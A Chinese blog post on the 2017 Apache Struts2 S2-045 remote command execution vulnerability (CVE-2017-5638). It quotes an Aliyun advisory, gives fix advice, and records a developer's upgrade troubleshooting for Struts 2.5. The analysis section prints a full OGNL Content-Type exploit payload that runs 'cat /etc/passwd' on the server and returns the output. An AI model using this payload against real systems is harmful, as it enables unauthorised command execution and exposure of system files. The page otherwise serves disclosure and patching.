Struts2 最新高危漏洞详解

最新推荐文章于 2024-06-08 07:30:31 发布
最新推荐文章于 2024-06-08 07:30:31 发布
阅读量2.1k 收藏 2
点赞数

由于计算机起源于美国,因此很多新兴技术和框架也都出于美国的一些大公司。虽然国内的BAT也在开源技术上有一些贡献,但目前来说还是比较缺少用户来支持。这也就导致了国内大部分互联网公司大量的依赖国外的技术。如果某些开源框架出了高危漏洞,就将影响一大批中国互联网公司。

最近 Struts2 又爆出了一个高危漏洞,据说影响了大半个中国互联网。涵盖金融、教育、医疗、电商等各个行业。哪么这个高危漏洞到底是怎样形成的呢?本文将为你详细讲解!
Struts2 漏洞概要

2017年3月6日,Apache Struts2被曝存在远程命令执行漏洞,漏洞编号:S2-045,CVE编号:CVE-2017-5638,官方评级为高危,该漏洞是由于在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行任意系统命令,导致系统被黑客入侵。

漏洞分析请移步:阿里云帮助云上用户应对Struts2高危漏洞
漏洞解决方案

如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞,请升级到struts 2.3.32或2.5.10.1版本(哔了狗了狗了,公司还在用struts2)。

由于目前使用版本是struts2-core-2.3.28,于是赶紧升了下级别,略过2.3 直接升级到2.5版本。
升级说明
找不到类
java.lang.ClassNotFoundException: org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter

查看了一下源码,2.5版本已变更了包路径。

struts2
org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter

配置好了居然找不到Action

什么情况?是不是有点怀疑人生了,赶紧去http://struts.apache.org/ struts2的官网扒拉扒拉。

由于版本跨度大,2.5版本升级了很多特性,在Struts 2.5中,严格DMI被扩展,它被称为严格方法调用 又名SMI。你可以想象DMI是一个“边境警察”,SMI是一个“税务警察”,并注意内部。使用此版本,SMI默认情况下启用(strict-method-invocation属性默认设置为 true在 struts-default包中),您可以选择禁用它每个包 - 没有全局开关禁用整个应用程序的SMI。

SMI的工作原理如下:
/ @AllowedMethods 被定义每个动作 - SMI工作,而不打开它,但只是那些动作(加上)
SMI已启用,但没有 / @AllowedMethods 被定义 - SMI工作,但只有
SMI已禁用 - 允许调用任何与默认RegEx匹配的操作方法 - ([A-Za-z0-9_KaTeX parse error: Expected group after '_' at position 252: …form([A-Za-z0-9_̲]*)".
启用SMI - 不会发生通配符替换,必须严格定义通过注释或标记可以访问哪些方法。

也就是说你必须加入这个配置才可以,最好全局设置:
regex:.*
package中元素顺序的问题
元素类型为 “package” 的内容必须匹配 "(result-types?,interceptors?,default-interceptor-ref?,default-action-ref?

出现此报错,你就要注意了,一定要检查package中 global-allowed-methods 的位置,然后按照报错指定顺序放置配置。
其他问题

如果你的项目中使用的是log4j而不是log4j2,那么问题就来了,你还需要加入log4j-api-2.7.jar 和log4j-core-2.7.jar,并且配置 log4j2.xml(暂且是个空的)。

<?xml version="1.0" encoding="UTF-8"?>

否则会一直报以下错误,至于为什么,还没深入了解。

ERROR StatusLogger No log4j2 configuration file found. Using default configuration: logging only errors to the console.

阿里云:

2017年3月6日,Apache Struts2被曝存在远程命令执行漏洞,漏洞编号:S2-045,CVE编号:CVE-2017-5638,官方评级为高危,该漏洞是由于在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行任意系统命令,导致系统被黑客入侵。

完成漏洞评级和确认影响范围后,阿里云安全应急团队迅速启动应急流程,对该漏洞进行成因分析,并迅速发布官方安全漏洞预警公告。

公告全文:https://help.aliyun.com/noticelist/articleid/20273580.html
联动响应 零安全事件

在流程启动启动的同时,阿里云云盾的各个产品联动响应,帮助用户应对Struts2漏洞。安骑士迅速完成云上ECS安全检测,态势感知用行为检测功能精准捕捉攻击源IP,Web应用防火墙在次日上午成功升级防护规则,帮助用户有效拦截利用该漏洞发起的攻击。

通过及时地检测、通知和规则升级,所有阿里云云盾用户均未因此漏洞发生安全事件。
漏洞分析
0x00 漏洞公告

根据官方的漏洞公告

https://cwiki.apache.org/confluence/display/WW/S2-045

可以看出漏洞的主要原因是出现在Content-Type


It is possible to perform aRCE attack with a malicious Content-Type value. If the Content-Type value isn'tvalid an exception is thrown which is then used to display an error message toa users.


通过http header中的Content-Type,注入OGNL语句来进行远程命令执行。

Struts2在对于异常的处理时出现了问题。
0x01 影响范围

受影响的版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
0x02 漏洞危害

    测试环境:tomcat7,Struts2.3.16
    测试过程:在上传页面拦截请求的数据包

0a671ae6a8898df47a67c7dd30f3da68cb892471

在http header里增加一个Content-Type的key,value就是我们的poc


%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat  /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}


0a671ae6a8898df47a67c7dd30f3da68cb892471

全球攻击分布态势

277ac59cb2aa8a7c517f960edfc844a758ee09fc
修复建议

    对于使用了基于Jakarta实现文件上传Multipart解析器,检测方式查看web目录下/WEB-INF/lib/目录下的struts-core.x.x.jar ,如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞,请升级到struts 2.3.32或2.5.10.1版本。
    使用其它方式实现文件上传的Multipart解析器。
    使用第三方的防护设备进行防护。
    删除commons-fileupload-x.x.x.jar文件(会造成上传功能不可用)。
    阿里云云盾Web应用防火墙已经支持该漏洞防御,点击这里可查看介绍。

 


前情概要

漏洞年年有,最近特别多。2017年3月6日,Apache Struts2被曝存在远程命令执行漏洞,漏洞编号:S2-045,CVE编号:CVE-2017-5638,官方评级为高危,该漏洞是由于在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行任意系统命令,导致系统被黑客入侵。

漏洞分析请移步:https://yq.aliyun.com/articles/72008
建议

如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞,请升级到struts 2.3.32或2.5.10.1版本(毕了狗了,公司还在用struts2)。

由于目前使用版本是struts2-core-2.3.28,于是赶紧升了下级别,略过2.3 直接升级到2.5版本。
升级说明

一、找不到类

java.lang.ClassNotFoundException: org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter

找不到那得多正常,查看了一下源码,2.5版本已变更了包路径。

     <filter>
          <filter-name>struts2</filter-name>
          <filter-class>    org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter
          </filter-class>
      </filter>

二、配置好了居然找不到Action

是不是有点怀疑人生了,赶紧去http://struts.apache.org/ struts2的官网扒拉扒拉。

由于版本跨度大,2.5版本升级了很多特性,在Struts 2.5中,严格DMI被扩展,它被称为严格方法调用 又名SMI。你可以想象DMI是一个“边境警察”,SMI是一个“税务警察”,并注意内部。使用此版本,SMI默认情况下启用(strict-method-invocation属性默认设置为 true在 struts-default包中),您可以选择禁用它每个包 - 没有全局开关禁用整个应用程序的SMI。

    SMI的工作原理如下:
     
    <allowed-methods> / @AllowedMethods 被定义每个动作 - SMI工作,而不打开它,但只是那些动作(加上<global-allowed-methods/>)
    SMI已启用,但没有<allowed-methods> / @AllowedMethods 被定义 - SMI工作,但只有<global-allowed-methods/>
    SMI已禁用 - 允许调用任何与默认RegEx匹配的操作方法 - ([A-Za-z0-9_$]*)
    您可以使用常量重新定义默认RegEx,如下所示 <constant name="struts.strictMethodInvocation.methodRegex" value="([a-zA-Z]*)"/>
     
    在操作定义中使用通配符映射时,SMI有两种方式:
     
    SMI被禁用 - 任何通配符将被替换为默认的RegEx,即:<action name="Person*" method="perform*">将被翻译成allowedMethod = "regex:perform([A-Za-z0-9_$]*)".
    启用S​​MI - 不会发生通配符替换,必须严格定义通过注释或<allowed-method/>标记可以访问哪些方法。

也就是说你必须加入这个配置才可以,最好全局设置:

<global-allowed-methods>regex:.*</global-allowed-methods>

三、package中元素顺序的问题

元素类型为 "package" 的内容必须匹配 "(result-types?,interceptors?,default-interceptor-ref?,default-action-ref?

出现此报错,你就要注意了,一定要检查package中 global-allowed-methods 的位置,然后按照报错指定顺序放置配置。

四、可能会出现的问题

如果你的项目中使用的是log4j而不是log4j2,那么问题就来了,你还需要加入log4j-api-2.7.jar 和log4j-core-2.7.jar,并且配置 log4j2.xml(暂且是个空的)。

    <?xml version="1.0" encoding="UTF-8"?>   
    <configuration status="error">   
      <appenders>   
      </appenders>   
      <loggers>   
        <root level="info">   
        </root>   
      </loggers>   
    </configuration>

否则会一直报以下错误,至于为什么,还没深入了解。

ERROR StatusLogger No log4j2 configuration file found. Using default configuration: logging only errors to the console.

好了,如果启动没有其他问题,应该就可以访问到久违的Action了。
Cccc柠檬
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
st2全漏洞检测java,Struts2漏洞利用复现(长期更新)
weixin_35647541的博客
03-10 1565
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担事情起因用靶场熟悉下Struts2漏洞利用工具注意:单纯的使用工具不能加深对漏洞的理解,熟悉漏洞原理才是重点工具列举HatBoy大佬的Struts2-Scan,以扫描某S2-001靶场为例:鬼哥struts2(CVE-2013-2251)漏洞检测工具(90sec.org),同样以某S2-001靶场为例:Lucifer1993写的...
Struts2漏洞检查工具2019 V2.3.exe
01-16
Struts2漏洞检查工具2019 警告: 本工具漏洞自查工具,请勿非法攻击他人网站! ==漏洞编号==============影响本=========================官方公告==========================================影响范围===== S2-057 CVE-2018-11776 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 https://cwiki.apache.org/confluence/display/WW/S2-057 影响范围非常小 S2-048 CVE-2017-9791 Struts 2.3.X http://127.0.0.1:8090/struts2-showcase/integration/saveGangster.action 影响范围非常小 S2-046 CVE-2017-5638 Struts 2.3.5-2.3.31,Struts 2.5-2.5.10 http://struts.apache.org/docs/s2-046.html 和S2-045一样 S2-045 CVE-2017-5638 Struts 2.3.5-2.3.31,Struts 2.5-2.5.10 http://struts.apache.org/docs/s2-045.html 影响范围较大 S2-037 CVE-2016-4438 Struts 2.3.20-2.3.28.1 http://struts.apache.org/docs/s2-037.html 影响范围小 S2-032 CVE-2016-3081 Struts 2.3.18-2.3.28 http://struts.apache.org/release/2.3.x/docs/s2-032.html 影响范围小 S2-020 CVE-2014-0094 Struts 2.0.0-2.3.16 http://struts.apache.org/release/2.3.x/docs/s2-020.html 影响范围小 S2-019 CVE-2013-4316 Struts 2.0.0-2.3.15.1 http://struts.apache.org/release/2.3.x/docs/s2-019.html 影响范围一般 S2-016 CVE-2013-2251 Struts 2.0.0-2.3.15 http://struts.apache.org/release/2.3.x/docs/s2-016.html 影响范围非常大 S2-013 CVE-2013-1966 Struts 2.0.0-2.3.14 http://struts.apache.org/release/2.3.x/docs/s2-013.html 未添加,S2-016范围内 S2-009 CVE-2011-3923 Struts 2.0.0-2.3.1.1 http://struts.apache.org/release/2.3.x/docs/s2-009.html 未添加,S2-016范围内 S2-005 CVE-2010-1870 Struts 2.0.0-2.1.8.1 http://struts.apache.org/release/2.2.x/docs/s2-005.html 未添加,S2-016范围内
Struts2系列漏洞利用工具-Struts2漏洞检测工具(三)
siu~
09-21 2837
Struts2系列漏洞利用工具
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 838
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
最新发布
qq_53058639的博客
06-08 1372
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。在账号密码的输入框中测试是否存在漏洞
Struts2高危漏洞 多行业成漏洞重灾区
xiao190128的专栏
03-10 1352
关注网络安全的朋友们,想必最近两天已经被一个高危漏洞刷屏,其来势汹汹让不少网络安全圈内人士咋舌。近日,多家网络安全公司发现并曝光了全球最为流行的Java Web服务器框架之一的Apache Struts2存在漏洞。而这一漏洞最终也被Struts2官方确认,其漏洞编号为S2-045,CVE编号:cve-2017-5638,并将其定级为高危漏洞。   Struts2目前被广泛应用于政府、金融、教
全网最全Struts 2 全漏洞检测工具最新struts漏洞更新
04-18
8. **安全更新检查**:提醒用户及时更新到最新、最安全的Struts 2本,以防止新发现的漏洞被利用。 渗透测试是网络安全的重要环节,通过使用这样的工具,不仅可以帮助开发者找出并修复Struts 2中的漏洞,还能提高...
Struts2漏洞检测工具2018最新
10-10
Struts2漏洞检测工具,支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-...
Struts2漏洞检查工具2018.rar
03-31
描述中提到的"Struts2漏洞扫描利用工具"表明该工具不仅能够扫描Struts2应用的漏洞,还可能包含了一些漏洞利用的模块。这可能是为了进行安全测试,模拟黑客可能采取的攻击手段,以便于防御。 在标签中,“漏洞...
Struts2漏洞检查工具Struts2.2019.V2.3
01-25
Struts2是一款非常流行的Java Web框架,用于构建企业级应用。然而,随着时间的推移,Struts2在安全方面暴露出了一些重要的漏洞,这给使用...定期进行漏洞扫描和更新Struts2最新本,是防止这类安全问题的有效手段。
STRUTS2的getClassLoader漏洞利用
01-30
引用《Springframework(cve-2010-1622)漏洞利用指南》:Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]
struts2目前无漏洞
11-14
struts2经常被发现有各种各样的漏洞,黑客会利用这些漏洞进行系统攻击,这个本是目前已修复所有露的本2.5.13
Struts2最新jar包2.5.17
08-28
Struts2最新jar包2.5.17
struts2通过过滤器拦截其漏洞配置方法
07-01
通过web配置拦截器进行struts2漏洞拦截源码及配置
linux高危漏洞怎么处理,Struts2高危漏洞解决方案一览
weixin_30119911的博客
05-16 442
Apache Struts2作为世界上最流行的Java Web服务器框架之一,3月7日带来了本年度第一个高危漏洞——CVE编号CVE-2017-5638。其原因是由于Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。Struts作为...
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9467
前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
struts2漏洞原理及解决办法
weixin_34092455的博客
03-27 713
Struts2被曝存在重大远程任意代码执行安全漏洞,影响Struts2全系本。而对于此次堪比棱镜事件的危害,安全宝指出,众多大型互联网厂商均存在该漏洞,且影响厂商仍在扩大之中。同时漏洞利用代码已经被强化,可直接通过浏览器的提交对服务器进行任意操作并获取敏感内容。目前安全宝用户暂可高枕无忧。同时也建议使用Struts开源架构的网站用户尽快加入安全宝云体系,以保护网站免受漏洞的威胁。  据悉,Str...
Struts2漏洞总结
ebonyzhang
04-06 3827
Struts2漏洞总结
struts2漏洞
杨航的专栏
03-10 2343
文章前半部分来自团队小伙伴阿德马的总结,后半部分的Poc和Exp是小编匆忙之际借鉴而来,感谢写Poc和Exp的伙伴~ 安恒给官方上报的,然后官方选择了1个对国内来说比较敏感的时期发了公告出来,好蛋疼。 该漏洞的CVE编号是CVE-2017-5638(s2-045),攻击者利用该漏洞可以进行远程命令执行,从而获取更高的服务器权限。 漏洞描述: 查了点资料,发现跟struts2配置中strut
Struts2框架搭建步骤详解
"struts2框架搭建教程" Struts2是一个流行的开源MVC框架,用于构建Java Web应用程序。这篇教程详细介绍了如何为初学者搭建Struts2框架环境。 首先,我们需要创建一个新的项目,命名为"struts2_1"。在Eclipse或其他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值